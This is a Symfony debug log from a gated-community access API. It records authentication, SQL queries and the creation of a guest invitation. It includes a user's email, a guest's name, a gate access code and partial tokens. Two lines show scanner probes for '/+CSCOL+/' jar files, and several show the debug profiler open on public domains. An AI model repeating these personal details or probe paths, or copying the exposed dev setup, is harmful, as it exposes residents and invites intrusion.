  9029. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9030. [2025-12-21 00:31:56] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9031. [2025-12-21 00:32:04] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  9032. [2025-12-21 00:32:04] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9033. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9034. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9035. [2025-12-21 00:32:04] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9036. [2025-12-21 00:32:04] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9037. [2025-12-21 00:32:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9038. [2025-12-21 00:32:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9039. [2025-12-21 00:32:04] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9040. [2025-12-21 00:32:04] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9041. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9042. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9043. [2025-12-21 00:32:04] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9044. [2025-12-21 00:32:04] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9045. [2025-12-21 00:32:04] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9046. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9047. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  9048. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9049. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9050. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  9051. [2025-12-21 00:32:04] doctrine.DEBUG: "START TRANSACTION" [] []
  9052. [2025-12-21 00:32:04] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"a57763e3-108b-4975-b9e8-a8 [...]","2":1,"3":"2025-12-21 00:32:04","4":"2025-12-21 00:32:04","5":"Izmir","6":"Gallardo","7":"513736","8":"/invitation/c1bd9d30ff6474 [...]","9":"2","10":"1","11":"2025-12-21 19:45:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  9053. [2025-12-21 00:32:04] doctrine.DEBUG: "COMMIT" [] []
  9054. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9055. [2025-12-21 00:32:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  9056. [2025-12-21 00:32:04] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9057. [2025-12-21 00:32:05] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  9058. [2025-12-21 00:32:05] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9059. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9060. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9061. [2025-12-21 00:32:05] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9062. [2025-12-21 00:32:05] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9063. [2025-12-21 00:32:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9064. [2025-12-21 00:32:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9065. [2025-12-21 00:32:05] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9066. [2025-12-21 00:32:05] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9067. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9068. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9069. [2025-12-21 00:32:05] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9070. [2025-12-21 00:32:05] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9071. [2025-12-21 00:32:05] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9072. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9073. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  9074. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9075. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  9076. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  9077. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  9078. [2025-12-21 00:32:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9079. [2025-12-21 00:32:05] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9080. [2025-12-21 00:34:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"99cc82","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/99cc82","method":"GET"} []
  9081. [2025-12-21 00:34:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  9082. [2025-12-21 00:35:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9f7f1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9f7f1","method":"GET"} []
  9083. [2025-12-21 00:35:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9084. [2025-12-21 00:39:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9085. [2025-12-21 00:39:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9086. [2025-12-21 00:47:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=request","method":"GET"} []
  9087. [2025-12-21 00:47:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  9088. [2025-12-21 00:49:32] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9089. [2025-12-21 00:49:32] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9090. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9091. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9092. [2025-12-21 00:49:32] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9093. [2025-12-21 00:49:32] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9094. [2025-12-21 00:49:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9095. [2025-12-21 00:49:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9096. [2025-12-21 00:49:32] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9097. [2025-12-21 00:49:32] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9098. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9099. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9100. [2025-12-21 00:49:32] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9101. [2025-12-21 00:49:32] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9102. [2025-12-21 00:49:32] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9103. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9104. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9105. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9106. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9107. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9108. [2025-12-21 00:49:32] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9109. [2025-12-21 00:49:32] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9110. [2025-12-21 00:49:37] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9111. [2025-12-21 00:49:37] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9112. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9113. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9114. [2025-12-21 00:49:37] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9115. [2025-12-21 00:49:37] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9116. [2025-12-21 00:49:37] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9117. [2025-12-21 00:49:37] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9118. [2025-12-21 00:49:37] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9119. [2025-12-21 00:49:37] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9120. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9121. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9122. [2025-12-21 00:49:37] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9123. [2025-12-21 00:49:37] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9124. [2025-12-21 00:49:37] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
